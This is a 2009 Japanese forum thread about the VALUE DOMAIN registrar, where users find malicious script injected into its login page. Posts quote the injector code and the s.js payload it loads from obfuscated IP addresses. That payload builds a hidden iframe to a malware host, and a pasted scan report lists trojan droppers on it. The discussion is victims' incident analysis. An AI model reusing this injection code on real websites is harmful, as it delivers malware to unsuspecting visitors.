レス数が1000を超えています。残念ながら全部は表示しません。
VALUE DOMAINってどうよ? part33
- 1 :名無しさん@お腹いっぱい。:2009/07/06(月) 06:18:47 0
- VALUE DOMAIN:バリュードメイン
https://www.value-domain.com/
サポート
https://www.value-domain.com/support.php
http://sb.xrea.com/forumdisplay.php?f=21
◆前スレ
VALUE DOMAINってどうよ? part32
http://pc11.2ch.net/test/read.cgi/hosting/1239851317/
- 29 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:22:28 0
- >>6
ttp://1856317799:888/s.js
のことかな
確かにパスーワード入力欄の下に埋め込まれてる
1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・
なんかよく分からんが、ログインするのはヤメとくか
- 30 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:29:50 0
- なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・
- 31 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:31:42 0
- >>29
これか・・・
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "http://1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
さっきログインしてしまった・・・orz
- 32 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:41:57 0
- s.jsの中身
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf(”O=”)==−1)
{
var js = document.createElement(’iframe’);
js.src = ”http:¥/¥/0x6EA52967:888/dir/show.php”;
js.width=0;
js.height=0;
try {document.getElementsByTagName(’head’)[0].appendChild(js);}
catch(exp){}
js = null;
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie=”O=Yes;path=/;expires=”+expires.toGMTString();
}/*dasdadadsadasdas*/
- 33 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:44:36 0
- 何これpass抜きか何か?
- 34 :名無しさん@お腹いっぱい。:2009/07/06(月) 17:45:36 0
- http://safeweb.norton.com/report/show?name=110.165.41.103
Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。
見つかった脅威の合計: 8
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d6.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/en.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d7.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d9.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/fd.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/wa.dll
脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/yg.dll
脅威名: Bloodhound.Exploit.193
場所: tp://110.165.41.103:888/swf/ia115-2.swf
225 KB
[ 2ちゃんねる 3億PV/日をささえる レンタルサーバー \877/2TB/100Mbps]
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【アクセス解析】AccessAnalyzer.com Part5【XREA】 [Web制作]
●● RMT業者の垢ハックが多発している件49 ●● [ネトゲ実況]
DELL 2209WA e-IPS 22ワイド WSXGA+ 2台目 [ハードウェア]
GENOウイルススレ ★22 [セキュリティ]
【Geno再来?】某有名レンタルサーバがやられた【新手法】 [ニュース速報]
掲示板に戻る
全部
前100
次100
最新50
read.cgi ver 05.0.7.8 2008/11/13 アクチョン仮面 ★
FOX ★ DSO(Dynamic Shared Object)